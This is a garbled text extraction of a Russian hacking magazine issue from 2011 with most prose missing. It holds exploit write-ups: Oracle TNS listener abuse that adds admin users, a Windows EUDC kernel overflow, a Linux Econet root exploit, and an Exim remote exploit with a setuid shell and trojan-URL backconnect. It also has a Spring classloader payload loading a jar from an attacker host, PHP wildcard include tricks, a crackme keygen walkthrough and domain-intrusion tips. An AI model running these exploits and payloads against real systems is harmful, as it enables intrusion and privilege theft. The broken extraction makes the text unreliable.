./tnscmd.pl -h 192.168.0.100 --rawcmd
"(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)
(HOST=)(USER=))(COMMAND=log_file)(ARGUMENTS=4)
(SERVICE=LISTENER)(VERSION=1)(VALUE=C:\Documents
and Settings\All Users\Start Menu\Programs\Startup\
blahblah.bat)))"
-h 192.168.0.100 Oracle';
--rawcmd , ,
.
: log_file
(COMMAND=log_file) (VALUE=C:\
Documents and Settings\All Users\Start Menu\Programs\Startup\
blahblah.bat).
X 02 /145/ 2011
./tnscmd.pl -h 192.168.0.100 --rawcmd

"(DESCRIPTION=(CONNECT_DATA=((
net user username password /add
net localgroup username /add
.
username password , . , .
Oracle , ,
.
,
- , . ,
.
Oracle DBA,
, .
glogin.sql. Oracle
C:\oracle\ora92\sqlplus\admin\glogin.sql.
SQL*Plus. DBA:
./tnscmd.pl -h 192.168.0.100 --rawcmd "(CONNECT_DATA=((
create user hacker identified by hacker;
grant dba to hacker;
"
, , , -
. jammed.com/~jwa/hacks/security/tnscmd/
tnscmd-doc.html TNS
listener'. z
035

CISS Research Team twitter.com/NTarakanov
01
MICROSOFT WINDOWS
TARGETS
Windows XP, 2003, Vista, 2008, 7

BRIEF
24
The Code Project .
,
.
,
.
WinAPI-
EnableEUDC,
NtGdiEnableEUDC. NtGdiEnableEUDC
, ,
:
SystemDefaultEUDCFont,
HKEY_CURRENT_USER\EUDC\<Current_code_
page>.

RtlQueryRegistryValues:
NTSTATUS RtlQueryRegistryValues(
__in ULONG RelativeTo,
__in PCWSTR Path,
__inout PRTL_QUERY_REGISTRY_TABLE QueryTable,
__in_opt PVOID Context,
__in_opt PVOID Environment
);
RTL_QUERY_REGISTRY_TABLE:
typedef struct _RTL_QUERY_REGISTRY_TABLE {
PRTL_QUERY_REGISTRY_ROUTINE QueryRoutine; //
,
ULONG Flags; // ,
PWSTR Name;
PVOID EntryContext; // ,

ULONG DefaultType;
PVOID DefaultData;
ULONG DefaultLength;
} RTL_QUERY_REGISTRY_TABLE,
*PRTL_QUERY_REGISTRY_TABLE;
036
, win32k.sys:
lea
eax, [ebp+var_424]
push esi ; Environment
mov
[ebp+DestinationString.Buffer], eax
eax, [ebp+DestinationString] ; eax
lea
UNICODE-,
mov
?SharedQueryTable@@3
PAU_RTL_QUERY_REGISTRY_TABLE@@A.EntryContext, eax
push esi ; Context
lea
eax, [ebp+SourceString]
push offset ?SharedQueryTable@@3
PAU_RTL_QUERY_REGISTRY_TABLE@@A ; QueryTable
push eax ; Path
push esi ; RelativeTo
mov
[ebp+DestinationString.Length], si
[ebp+DestinationString.MaximumLength], 208h
mov
; UNICODE-
mov
PAU_RTL_QUERY_REGISTRY_TABLE@@A.QueryRoutine, esi
;_RTL_QUERY_REGISTRY_TABLE * SharedQueryTable
mov
PAU_RTL_QUERY_REGISTRY_TABLE@@A.Flags, 24h
; Flags
mov
PAU_RTL_QUERY_REGISTRY_TABLE@@A.Name,
offsetaSystemdefaulte
; "SystemDefaultEUDCFont"
mov
PAU_RTL_QUERY_REGISTRY_TABLE@@A.DefaultType, esi
mov
PAU_RTL_QUERY_REGISTRY_TABLE@@A.DefaultData, esi
mov
PAU_RTL_QUERY_REGISTRY_TABLE@@A.DefaultLength, esi
mov
dword_A0179214, esi
mov
dword_A0179218, esi
mov
dword_A017921C, esi
call ds:__imp__RtlQueryRegistryValues@20
;RtlQueryRegistryValues(x,x,x,x,x)
Flags: 0x24,
RTL_QUERY_REGISTRY_REQUIRED | RTL_QUERY_
REGISTRY_DIRECT. RTL_QUERY_REGISTRY_DIRECT
, QueryRoutine
, EntryContext
. !
: , HKEY_CURRENT_
USER\EUDC\CP-1251 SystemDefaultEUDCF ont
X 02 /145/ 2011
Windows 7
(, REG_BINARY) .
, .
char szKeyName[MAX_PATH], buff[0x800];
sprintf_s(szKeyName, MAX_PATH, "EUDC\\%d", GetACP());
RegCreateKey(HKEY_CURRENT_USER, szKeyName, &hKey);
memset(buff, 0x41, 0x800);
RegSetValueEx(hKey, EUDC_FONT_VAL, 0, REG_BINARY, buff,
0x800); // 0x800 , REG_BINARY
RegCloseKey(hKey);
EnableEUDC(TRUE); //
,
Windows 2000, Vista, 2008 7. XP 2003- ,
, .
SOLUTION
,
- , :
1. .
2. HKEY_USERS\<SID>\EUDC
( <SID> ).
3. ,
.
02

LINUX
TARGETS:
Linux Kernel <= 2.6.37

BRIEF
, 3 , X 02 /145/ 2011

. ,
.
1. (CVE-2010-4258), , . clone(2).
clone(2)
CLONE_CHILD_CLEARTID,
-
037
.
put_user(), API access_ok()
Windows ProbeForRead/ProbeForWrite.
( ) ,

set_fs(KERNLE_DS), OOPS ( , , ),
access_ok() .

,
.
, access_ok() . ,
: get_fs() set_fs().
, access_ok()
. set_fs(),
.
, set_fs(KERNEL_DS), access_ok()

. set_fs(KERNEL_DS) ,
, .
:
038
old_fs = get_fs();
set_fs(KERNEL_DS); // access_ok()
vfs_readv(file, kernel_buffer, len, &pos); // set_
fs(KERNEL_DS) vfs_readv ,
access_ok()
set_fs(old_fs); //
2. (CVE-2010-3849) Econet-,
.
3. (CVE-2010-3850)
,
Econet- .
linux,
, .
Kernel OOPS: OOPS ( ) , - BUG(),
asserta,
,
do_exit(). ,
OOPS'a, set_fs()- . ,
access_ok() do_exit() !
CLONE_CHILD_CLEARTID flags clone()
X 02 /145/ 2011

,
,
.
task_struct ( /):
strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

// eth0
ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);
// Econet
splice(fildes[3], NULL, fildes[1], NULL, 128, 0);
splice(fildes[0], NULL, fildes[2], NULL, 128, 0);
// Null
put_user(0, tsk->clear_child_tid);
,
get_fs() == KERNEL_DS,
, .

get_fs() == KERNEL_DS? ,
splice(). splice()
, . Econet-
splice() ,
econet_sendsmg set_fs(KERNEL_DS).
:
splice()
fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);
fildes[3] = open("/dev/zero", O_RDONLY);
(credentials
)
econet_ioctl = get_kernel_sym("econet_ioctl");
econet_ops = get_kernel_sym("econet_ops");
commit_creds = (_commit_creds)
get_kernel_sym("commit_creds");
prepare_kernel_cred = (_prepare_kernel_cred)
get_kernel_sym("prepare_kernel_cred");

clone((int (*)(void *))trigger,
(void *)((unsigned long)newstack + 65536),
CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,
/* CLONE_CHILD_CLEARTID */
&fildes, NULL, NULL, target);
ioctl(fildes[2], 0, NULL);
execl("/bin/sh", "/bin/sh", NULL);
// shell
,
econet_sendmsg
int trigger(int * fildes)
{
int ret;
struct ifreq ifr;
memset(&ifr, 0, sizeof(ifr));
X 02 /145/ 2011
pointer dereference
/* ... */
exit(0);
}
SOLUTION
Release Candidate'
03
EXIM
TARGETS:
Exim 4.63 (RedHat/Centos/Debian)
Kingcope serverside Open Source

Exim.
Exima,
2006 (exim.org/
lurker/message/20060731.142652.97e79ab1.en.html seclists.org/
fulldisclosure/2010/Dec/233),
.
BRIEF
diff- expand.c ,
integer overflow.
, Payload backconnect shell c
root.
#include <stdio.h>
#include <unistd.h>
int main(int argc, char *argv[])
{
setuid(0);
setgid(0);
setgroups(0, NULL);
execl("/bin/sh", "sh", NULL);
}
039

:
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s;
rm /var/spool/exim4/s.c");
open FILE, ">/tmp/e.conf";
print FILE "spool_directory = \${run{/bin/chown
root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /
var/spool/exim4/s}}";
close FILE;
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf");
system("uname -a;");
system("/var/spool/exim4/s");
system($system);
, - helpa
, :).
if ($#ARGV ne 3)
{
print "./eximxpl <host/ip> <trojanurl> <yourip>
<yourport>\n";
print "example: ./eximxpl utoronto.edu
http://www.h4x.net/shell.txt 3.1.33.7 443\n";
exit;
}
, -. ,
integer overflow:
$max_msg = 52428800;
$msg_len = $max_msg + 1024*256;
.....
while (length($body) < $msg_len)
{
$body .= $v;
}
$body = substr($body, 0, $msg_len);
.....
print $sock $body;
shellcode.
SOLUTION
exim 4.64 (lists.exim.org/lurker/messag

e/20061220.105401.340f1c13.en.html)
integer overflow.
04
LINUX
TARGETS:
Linux kernel
BRIEF

,
mmap_min_addr.

. , install_special_
mapping ( vdso)
040
40
insert_vm_struct,
mmap_min_addr .
$ cat /proc/sys/vm/mmap_min_addr
65536 <---- 0x10000
$ cat install_special_mapping.s
section .bss
resb BSS_SIZE
section .text
global _start
_start:
mov
eax, __NR_pause
int
0x80
$ nasm -D__NR_pause=29 -DBSS_SIZE=0xfffed000 -f elf -o
install_special_mapping.o install_special_mapping.s
$ ld -m elf_i386 -Ttext=0x10000 -Tbss=0x11000 -o install_
special_mapping install_special_mapping.o
$ ./install_special_mapping &
[1] 14303
$ cat /proc/14303/maps
0000f000-00010000 r-xp 00000000 00:00 0
[vdso] <------ !
00010000-00011000 r-xp 00001000 00:19 2453665
/home/taviso/install_special_mapping
00011000-ffffe000 rwxp 00000000 00:00
[stack]
,
4096 mmap_min_addr.
, Linux Red Hat mmap_min_addr 4096, ,
!
SOLUTION
:
--- a/fs/exec.c
+++ b/fs/exec.c
@@ -275,7 +275,14 @@ static int __bprm_mm_init(struct
linux_binprm *bprm)
vma->vm_flags = VM_STACK_FLAGS | VM_STACK_INCOMPLETE_
SETUP;
vma->vm_page_prot = vm_get_page_prot(vma->vm_flags);
INIT_LIST_HEAD(&vma->anon_vma_chain);
+
+ err = security_file_mmap(NULL, 0, 0, 0, vma->vm_
start, 1);
+
+ if (err)
+
goto err;
+
err = insert_vm_struct(mm, vma);
+
--- a/mm/mmap.c
+++ b/mm/mmap.c
@@ -2479,6 +2479,11 @@ int install_special_
mapping(struct mm_struct *mm,
vma->vm_ops = &special_mapping_vmops;
vma->vm_private_data = pages;
+ if (security_file_mmap(NULL, 0, 0, 0, vma->vm_start,
1)) {
+
kmem_cache_free(vm_area_cachep, vma);
+
return -EPERM;
+ }z
X 02 /145/ 2011

norseev@gmail.com
WHATHTML

. .
crackme WhatHTML, c
Chiwaka,
. .
,
,
(, ,
).
- :
, .
:
,
. , , ,
.

.
crackme', keygen'
: , -
042
. ,
,
.
Crackme WhatHTML . .
, Chiwaka.
crackme cracklab.ru/
crackme/whathtml.zip. ,
. , . .
Machinecode . ,
. , Name Serial,
keygen.
X 02 (145) 2011

, , , .
.
, .
ShowHTMLDialog mshtml.dll (
LoadLibraryA GetProcAddress).
, .
, IDA Pro,
:
.text:00401043
call
sub_4010B2
.text:00401048
call
sub_401298
.text:0040104D
call
sub_401169
; ,
; , sub_401298
cmp
dword_40303B, 0
.text:00401052
.text:00401059
jnz
short loc_401060
.text:0040105B
call
sub_401298
;
large dword ptr fs:0
pop
.text:00401060
.text:00401067
add
esp, 4
.text:0040106A
push
0 ; uExitCode
call
ExitProcess
.text:0040106C
.text:0040106C start endp
, (sub_4010B2, sub_401298, sub_401169);

, Register,
X 02 (145) 2011
sub_401060. ,
.
.
Machinecode
sub_4010B2. GetSystemInfo,
, Machinecode.
sub_401298 .
ShowHTMLDialog.
html- .
html- ,
Register,
JavaScript. :
function okButtonClick()
{
var x = 0;
var y = 0;
var z = 0;
var charx = 0;
var chary = 0;
var myName = Name.value;
var mySerial = Serial.value;
var myRandom = Random.value;
for (var i=0; i<myName.length; i++)
043
{
x =
x + myName.charCodeAt(i);
}
for (var i=0; i <mySerial.length; i++)
{
charx = mySerial.charCodeAt(i-1);
chary = mySerial.charCodeAt(i);
if (charx != chary)
{
z = z + chary;
charx = chary;
}
}
for (var i=0; i <arrArgs.length;i++)
{
y = y + arrArgs.charCodeAt(i);
}
window.returnValue =x.toString(10)+ "?"
+ z.toString(16) + "?" + y.toString(10);
window.close(); }
JavaScript, ,
, ,
( Machinecode).

,
. , ?. , .
044
sub_401298, ,
sub_401169,
,
.

, . : 725,
725h.

, , .
:
; .
; xor. cx
ebx, dword_403CF4
.text:00401225
mov
.text:0040122B
lea
eax, String ; ".\b"
.text:00401231
xor
edx, edx
.text:00401233
jmp
short loc_40123C
.text:00401235
.text:00401235 loc_401235:
.text:00401235
xor
[edx+eax], cx
.text:00401239
add
edx, 2
.text:0040123C
.text:0040123C loc_40123C:
.text:0040123C
cmp
edx, ebx
.text:0040123E
jb
short loc_401235
X 02 (145) 2011

;
;
;
;
;
,

.
,
.
.text:00401240
.text:00401246
.text:00401249
.text:0040124B
.text:0040124F
.text:00401251
.text:00401255
lea
cmp
jnz
cmp
jnz
cmp
jnz
eax, unk_403072
byte ptr [eax], 28h
short loc_401272
byte ptr [eax+5], 12h
short loc_401272
byte ptr [eax+0Ah], 1
short loc_401272
; , ,
;
sub_401372
.text:00401257
call
, :
1. Machinecode;
2. ;
3. Machinecode,
JavaScript- ;
4. ;
5. ;
6. ,
;
7. ,
.
, .
, ,
.
- :
,
. , ,
, .
X 02 (145) 2011
nop'. (-, ).
, .
-, xor, ,
,
xor , . -, cx,
, . ,
(,
).
: 04E6h.
,
mov cx, 04E6h, keygen.
, keygen
. keygen :
1. , ,
;
2. , ;
3.
( , );
4. , ,
, ;
5. , ,
;
6. ,
.
keygen.
, . , ,
, .
, ,
, , ,
. z
045

norseev@gmail.com
,
. ,
,
.
.
-
,
- .
, . ,
World of Warcraft, Lineage, Warhammer . ,

,
.
.
, TimeZero .
, Flash
Java. ,
. , ,
, ,
, Flash. ,
.
, -, , API .
, Mail.ru, Yahoo
046
. .

. ,
,
(, , ) .
,
,
, (),
.
.
? , , , LinguaMania (vkontakte.
ru/app750611). .
,
, ,
. , ,
. . X 02 (145) 2011
HttpWatch

, ,
.
,
. 100 000
2-3 , .
. - :
.
: , . HTTP-
, HTTPWatch
Internet Explorer' (httpwatch.com). , , Record , ,
2 . ,
, .
, , state : PHASE1, PHASE2, PHASE3, GUESS, LOSE.
: ,
, , ,
. , question_id, ,
, .
question_mask . ,
state=PHASE3, C, A,
???A. GUESS LOSE, , .
, question_mask :
, . .
.
. , ,
. question_id ,
, . ,
, state PHASE1, PHASE2 PHASE3.
, : , .
? . . .
X 02 (145) 2011
.
, , ,
, .
WinPCap,
.
.
Internet Explorer. , ,
, , .
COM-: COM ( IWebBrowser2
Internet Explorer), .
,
, . -. , Socks 4/5 .
. ,
Socks-,
.
Socks- : faqs.org/rfcs/rfc1928.html.
. .
-,
SOCKET mysocket
sockaddr_in local_addr;
local_addr.sin_family = AF_INET;
local_addr.sin_port = htons(MY_PORT);
local_addr.sin_addr.s_addr = 0;
mysocket = socket(AF_INET, SOCK_STREAM, 0);
bind(mysocket, (sockaddr *)&local_addr,
sizeof(local_addr));
listen(mysocket, 1080);
SOCKET client_socket;
sockaddr_in client_addr;
int client_addr_size = sizeof(client_addr);
while ((client_socket = accept(mysocket,
(sockaddr *)&client_addr, &client_addr_size)))
{
DWORD thID;
CreateThread(NULL, NULL, ClientThread,
&client_socket, NULL, &thID);
}
...
Windows,
WSAAsyncSelect().
047

C++ Visual Studio 10 DVD
.
Socks-,
, .
c :
SOCKET server_socket;
WSADATA wsaData;
int server_port = 3128;
int queue_size = 5;
struct sockaddr_in server_address;
#define SERVER_ACCEPT WM_USER + 1
#define CLIENT_EVENT WM_USER + 2
#define TARGET_EVENT WM_USER + 3
#define SOCKET_OPENED WM_USER + 4
#define SOCKET_CLOSED WM_USER + 5
int ServerStart(HWND hWnd)
{
int rc;
WSACleanup();
WSAStartup(0x0101, &wsaData);
server_socket = socket(AF_INET, SOCK_STREAM, 0);
server_address.sin_family = AF_INET;
server_address.sin_addr.S_un.S_addr =
inet_addr("127.0.0.1");
server_address.sin_port = htons(server_port);
bind(server_socket, (LPSOCKADDR)&server_address,
sizeof(server_address)) ;
listen(server_socket, queue_size);
/* !!! */ rc = WSAAsyncSelect(server_socket,
hWnd, SERVER_ACCEPT, FD_ACCEPT);
return 0;
}
? ,

.
hWnd SERVER_ACCEPT
.
.
SERVER_ACCEPT
. , accept(),
CLIENT_EVENT, ,
:
client_socket = accept(server_socket,
(LPSOCKADDR)&socket_record->client_address, &len);
048
rc = WSAAsyncSelect(socket_record->client_socket,
hWnd, CLIENT_EVENT, FD_READ | FD_CLOSE);
. CLIENT_EVENT. lParam
FD_READ (
), FD_CLOSE (
).
if(WSAGETSELECTEVENT(lParam) == FD_READ) {
c = recv(socket_record->client_socket, &bf[0], 1,0);
...
}
if(WSAGETSELECTEVENT(lParam) == FD_CLOSE) {
...
}
,
. Socks-, . , Socks5,
4- . RFC.
Socks- :
(4 5) N.
N .
3 : 05h, 01h 00h. , 00h, ,
. .
, 05h, () ,
. 00f,
. ,
: ,
, , .
, -.
- ,
( ) .
IPv4, 01h .
4,
IP- . -
* 256 + .
, , .
- ,
. ,
-, Socks- . ,
, -. , -, . Socks-.
,
X 02 (145) 2011

, ,
FD_READ , ,
-, .
,
.
, , , . , ,
. ,
, ,
id. , LOSE GUESS
. ,
.
.
. , COM-
IWebBrowser2 Internet Explorera,
. Flash-
Flash API, . . .
Internet Explorer? ?
.
SendInput. keydb_event()/mouse_event(),
(Microsoft). F5:
INPUT pInput;
pInput.type = INPUT_KEYBOARD;
pInput.ki.wVk = VK_F5;
pInput.ki.time = 0;
pInput.ki.wScan = 0;
pInput.ki.dwFlags = KEYEVENTF_EXTENDEDKEY;
SendInput(1, &pInput, sizeof(pInput));
! Socks-, , ,
, . !
, , , . . ,
. ,
, ,
, .
- , , ,
.
.
. ,
. :
X 02 (145) 2011
vkontakte.ru/app750611;
.

.
vkontakte.ru/app707522.

, .
.
. : vkontakte.
ru/app716582.
,
, ,
.
, , ,
,
, ,
.
, .
, , ,
.

. , ,
.
. .

,
, , ,
.
. , , ,
, . (
, )
.

.
, . . . , ,
.
, . .
. ,
80- .
, . , ,
,
. z
049

sh2kerr dsecrg.ru
WELCOME
TO MALAYSIA!
HITB -
security-
Hack In The Box, 11 14 -.
: -, ;
-, ; -,

.
- HITB: 2003
. 7 HITB security-,
.
, .
ROP,
. HITB Linux
, NX, ASLR ASCII-Armor.
ROPME, ,
ROP- ROP ( ,
). ,
, .
The Grugq
, HITB. GSM-.
RACHell,
DoS GSM. IMSI
050
Flood VLR HLR,

. ,
Baseband- OpenBTS Coseinc GSM FuzzFarm.
- Sogeti ,
DRM- QuickTime iTunes.
, ,
, , , , .

.
, (
JailBreak) . , , . ,
, (
, :)), .
, Smartphones, Applications & Security ,
,
(
), ,
.
X 02 (145) 2011
, ,

,

(
, ).

,
web2.0. Browser DOM. ,
.
,
, ,
(
),
.

DOM Stealing.
,
.
,
temp url-
:
temp = "login.do?user="+user+"&pwd="+pwd;
xmlhttp.open("GET",temp,true); xmlhttp.
open("GET",temp,true);
xmlhttp.onreadystatechange=function()
, document.body,
, ,
.
, DOM XSS
Flash- Silverlight, ... .
-
. HITB , ,
. Intel RTL (Register Transfer
Level). , - , ,
(
).
TEHTRISecurity. MITM- web.

.
X 02 (145) 2011
SAP
web-, (), .
.
,
.

, . ,
,
. ,

. ,
, .
, , ,
.
,
.

.

,
,
. :
-
.
, , , -

.
, ,
, ,
-.
, ?

, .
:
VASTO , The Virtualization
Assessment Tolkit.
. ,
Vmware Version, soap 80
.
DVD
dvd

DVD
HTTP://WWW
links

conference.
hackinthebox.org/
hitbsecconf2010kul/
materials/
051
. : , ,

, ,
.
(VMware VI client) ,
, , ActiveX. .
:
<ConfigRoot>
<clientConnection id="0000">
<authdPort>902</authdPort>
<version>3</version>
<patchVersion>3.0.0</patchVersion>
<apiVersion>3.1.0</apiVersion>
<downloadurl>https://*/client/VMwareViclient.exe</downloadurl>
</clientConnection>
</ConfigRoot>
MITM,

.
url-, POST-
,
( IP-
).

, , .
, ,
, .
, .
, , ,
, .

ACROS. DLL Hijacking.
, ,
.
DLL Hijacking:

,
052
. Stuxnet SAP
, IM

DLL ZIP-
DLL ZIP USB
DLL ZIP CD

, . exe- CreateProcess
:
,
(CWD)
C:\windows\system32
C:windows\system
C:windows\
System Path; User Path
. ,
ShellExecute ,
! ,
, , . ,
, DLL Hijacking
Binary planting ( ACROSS),
120 EXE planting.
ACROS Binary Planting Detector
( :)),
.
,
, . www.binaryplanting.
com
.
, ,
ps/2-, . , :
. , ,
.
, ,
, . .
,
.
, ,
. ,
X 02 (145) 2011
-
,
.
, (, , ).
.
, ,
. , , .
, . . , Blackhat, 2000 .

. ,
, embended OS, ,
. , - ,
, , .
, ,
, ,
, . :
- . , , ,
,
.
. ,
: , .
: -: , .
X 02 (145) 2011
,
url (, bit.ly). , ,
, ,
. : URL , . ,
. , .
VLC-. ,
. ,
, ,
- .
, ,
. , . .
<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1"
xmlns="http://xspf.org/ns/0/"
xmlns:vlc="http://www.videolan.org/vlc/playlist/
ns/0/">
<title>Playlist</title>
<trackList>
<track>
<location>
smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}
</location>
<extension
application="http://www.videolan.org/vlc/
playlist/0">
<vlc:id>0</vlc:id>
053

RAZ0R HTTP://RAZ0R.NAME
HITB
, : , ,
?.
HTML5
. , <Canvas>, ,
getimagedata(), -
. , ... , :).
,
Java

</extension>
</track>
</trackList>
</playlist>
- .
smb-.
Alpha-numeric -.
url bit.ly.

<embed type="application/x-vlc-plugin"
width="320" height="200"
target="http://tinyurl.com/ycctrzf"
id="vlc" />
, , , - .
, , , XSS .
: 0day ie+java. , !
, ?
-. , -, . -
,
. , -
054
.
, . , Java ,
.
, Google,
. ,
Apache struts2, Spring JBoss Seam
.
Spring. MVC,
,
POST-. , ,
. , , POST:
POST /adduser HTTP/1.0
...
user.address.street= Disclosure+Str
:
frmObj.getUser().getAddress().setStreet(
"Disclosure Str.")
, :
POST /adduser HTTP/1.0
...
class.classLoader.URLs[0]=jar:http://attacker/springexploit.jar!/
URL jar-,
. X 02 (145) 2011
, url
.
. jar- TDL-,
tag-.
/META-INF/spring-form.tld which defines form:input
and form:form tags:
<tag-file>
<name>input</name>
<path>/META-INF/tags/InputTag.tag</path>
</tag-file>
<tag-file>
<name>form</name>
<path>/META-INF/tags/InputTag.tag</path>
</tag-file>
tag-, , java- . ,
, :
/META-INF/tags/InputTag.tag:
<%@ tag dynamic-attributes="dynattrs" %>
<%
java.lang.Runtime.getRuntime().exec("mkdir /tmp/
PWNED");
%>
, ,
jsp-,
, -
DoS, , .
X 02 (145) 2011

.
,
, .
, .
Java ,
Thinking
Java. , ,
DSECRG,
HITB
.
, , . ,
: HITB' lockpicking,
- . -
, .
( look.nl),
.
, ,
(, :)).
PS
Blackhat. ,
, , ,
! , , ( ) , . BlackHat

! z
055
UNIXOID
d0znp onsec.ru
!

PHP
. ,
,
.
-, php-...
- Error-based MySQL, unserialize -
.
.
- ,
file name truncated.
- , ,

, ,
.
, :
(
- ,
),
.

.
Fuzzing
...
,
056

: http://code.google.com/p/pasc2at/
wiki/SimplifiedChinese,

. ,
, .

:
<?php
for($i=0;$i<255;$i++)
{
$url = '1.ph'.chr($i);
$tmp = @file_get_contents($url);
if(!empty($tmp))
echo chr($i)."\r\n";
}
?>
,
,
win32 :).
google.translate,
.
, ,

4 : 1.phP, 1.php, 1.ph>, 1.ph<.

,
. ,
,
.
!
.
,
,
, , ?
X 02 (145) 2011
Wiki.
, ...
.
:

FindFirstFile.
> ?, < *,
. ,
, , < *
, << .
,
(. ).
, . MS.
1.p<0 (- )
1.p< ( )
1.p<"
1.p<.
1.p<<
1.p>>
1.p<>
1.p><
1.p<(p/P)
1.p>(p/P)
1.p(h/H)<
1.p(h/H)>
1.p(h/H)(p/P)

: ,
, , -. ,
:
<?php
if (file_get_contents("test.php".str_
repeat("\"",10).str_repeat(" ",10).str_
repeat(".",10))) echo 1337;
?>
, 1337, , .
,
- .
,
:
file\./.\.
file////.
file\\\.
file\\.//\/\/\/.
, :
, .
,
.

< >?
WINAPI
,
. :
. X 02 (145) 2011
MSDN
,
FindFirstFile ,
. : msdn.microsoft.com/en-us/library/aa364418(v=vs.85).
aspx.
> < ", ...
Bug?!
The characters of '<' and '>' are treated like
wildcard by this function.
[MSFT] these are listed in the Naming A File
topic as illegal characters in path and file
names. That topic is being updated to make this
clearer.
History
10/19/2007
xMartian
5/2/2008
Mark Amos MSFT
2007 !
...
:). , , PHP.

. ,
(MSDN )
, ,
WIN-.
FindFirstFile
( ). , ,
, file_get_
contents:
0. * ?
FindFirstFile PHP ().
1. < FindFirstFile *,
HTTP://WWW
links

FindFirstFile: msdn.microsoft.
com/en-us/library/
aa364418(v=vs.85).
aspx;

(
):
msdn.microsoft.
com/en-us/library/
aa365247(v=vs.85).
aspx;

Windows:
technet.microsoft.
com/en-us/library/
cc722482.aspx;
(
,
): oxod.ru.
WARNING
warning

.

,

,
,

.
057
M4g snipper.ru. , ,
-
.
, (. ).
* <<.
: include('shell<') shell*,
, , .
2. > FindFirstFile ?,
.
: include('shell.p>p') shell.p?p,
,
, .
3. " FindFirstFile .
: include('shell"php')
include('shell.php').
4. ,
.
: fopen("htaccess") fopen(".htaccess"),
, .1, fopen("h<<").
"", , ,
.
5.
( ), ,
, ", .
: fopen("")
6. , \\,
, .
. , , 4 ,
max_execution_time ( ,
][ 04.2010). allow_url_
fopen=Off RFI.
: include('\\evilserver\shell.php')
7. , \\.\,
.
: include('\\.\C:\my\file.php\..\..\..\D:\
anotherfile.php').
8.
.
: file_get_contents('C:boot.ini') file_
get_contents('C:/boot.ini')
9. DOS-
. , . ,
,
, -. ,
,
.
: Specifically, if more than four files use the
same six-character root, additional file names are
created by combining the first two characters of the
file name with a four-character hash code and then

appending a unique designator. A directory could have
files named MYFAVO~1.DOC, MYFAVO~2.DOC, MYFAVO~3.
DOC, and MYFAVO~4.DOC. Additional files with this
root could be named MY3140~1.DOC, MY40C7~1.DOC, and
MYEACC~1.DOC.
: in.conf DOS IND763~1.CON,
file_get_contents('<<D763<<'),
!
- , , ,
.
10. PHP ( mod_php, php.exe)
aux, con,
prn, com1-9, lpt1-9.
: file_get_contents('C:/tmp/con.jpg') CON -, EOF.
: file_put_contents('C:/tmp/con.jpg',chr(0x07))
( :)).
.
:).
058

: ,

,
file_get_contents, , ,
PHP.
, ,
. .
:
fopen
file_get_contents
copy
parse_ini_file
readfile
file_put_contents
mkdir
tempnam
touch
move_uploaded_file
include(_once)
require(_once)
ZipArchive::open()
X 02 (145) 2011
.
. ,
whitepaper.
test.php?a=../a<%00
* <.
, ?
:
rename
unlink
rmdir
, ? .
PoC:
, .
.htaccess h<< (. .4, .1). (. .9.). .
,
. :
<?php
file_get_contents("/images/".$_GET['a'].".jpg");
?>
-.
Warning: include(/images/../a<) [function.include]:

failed to open stream: Invalid argument in ...
Warning: include(/images/../a<) [function.include]:

failed to open stream: Permission denied ...
, .
. (. ,
. SQL- ][ 12.2009).
SQL-.
,
. ,
. ,
.
, ,
web- (snipper.ru/view/18/maloizvestnye-sposoby-atakna-web-prilozheniya) 19 ,
, ,
. z
FindFirstFile MSDN . 2007 ...
X 02 (145) 2011
059

Digital Security (a.sintsov@dsec.ru)
Domain Controller with clients

Domain Controller
Domain clients
Switch
Domain clients
Computer 4
Computer 1
Computer 2
Computer 3
Network Printer
Printer
,
Ative Directory
Windows.
.
, , ,

.
, , ,
. Active
Directory. , . ,
, , , , , .
( ), . . ,
, .
, ,
-
060
.
, , ,
. , , , Windows 2000/2003/2008, XP/Vista/7.
, , . ,
: ru.wikipedia.org/wiki/Active_Directory.
Sun: , . , ,
. .
, , . .
, : , , .
X 02 (145) 2011
Client
Server
(1) SMB_COM_NEGOTIA
TE Request
TE Response
(2) SMB_COM_NEGOTIA
(3) SMB_COM_SESSION
_SETUP_ANDX Reques
t1
[NTLM NEGOTIATE_MES
SAGE]
1
_SETUP_ANDX Response
(4) SMB_COM_SESSION NGE_MESSAGE]
[NTLM CHALLE
(5) SMB_COM_SESSION_SETUP_A
NDX Req
[NTLM AUTHENTICATE_MESSAGE uest 2
]
sponse 2
Re
ION_SETUP_ ANDX
(6) SMB_COM_SESS
NTLM Chalenge response
. ( )
.
, ,
. :
, , ,
.
Wi-Fi , (,
, ).

. , , LAN
, -,
. , ,
,
.
. ,
... . ? ,
DNS-. , , , 53- . nmap.
, IP- DHCP, DNS-, nslookup
70% .
, , , .
, . ARP-
DNS. ARP-PING ,
IP- . ,
OSI .
, . , ARP-PING
:
: ,
?
3 : , ! ,
3!
X 02 (145) 2011
0day Confliker'

,
ARP, MAC-
, IP-.
. nmap Cain&Abel.
, , :).
DNS,
. DNS. DNS . -
:
C:\> nslookup
Default Server: windomain.domain
Address: 192.168.1.33
>ls -d windomain.domain > file.txt
, file.txt IP-. ? 80%

,
(, SQL-). DNS ,
IP-,
ARP- (Cain ).
, .

( ) . ,
, ,
IPC$. .

. , , ,
:). , , . ,

(SID). , RID (
SID), .
, Cain&Abel,

(sid2user). , . nmap'.
. : (, radmin), (radmin/vnc).
-, ,
, , , . ,
,
.
061
Object Table
Secured
Object
Process
Handle
Security
Descriptor
ACE
Security
ID
Access Token
Assigned when user
logs on
DACL
ACE
ACE
Object
Assigned when object is
created
Access
Denied
Read
Write
Access
Rights
Execute
Access
Rights
Access Token
, ( /SNMP ).
. , ,
.
. ,
:). , .
,
, :
search ms0 -t great

.
. ,
Confliker Stuxnet, ms08-067
ms10-061 . , ,
:). ,
. , ms10-061 ,
, .
,
, ,
- .
,
IDS, . , IDS
,
meterpreter ( ) . ,
?
, . . :
,
,
, ,
. , , ,

:).
, , ,
.
062
.
, ,
, .
, MSSQL 2000 sa:sa,
Oracle 9i system:manager. ,
. -
.
( ,
),
, , ,
.
HASH
.
? ,
. .
,
. ?
, , , .
, ?
. NT AUTHORITY\SYSTEM,
.
,
, . ,
, ,
getsystem.
, MS09-012, MS10-015
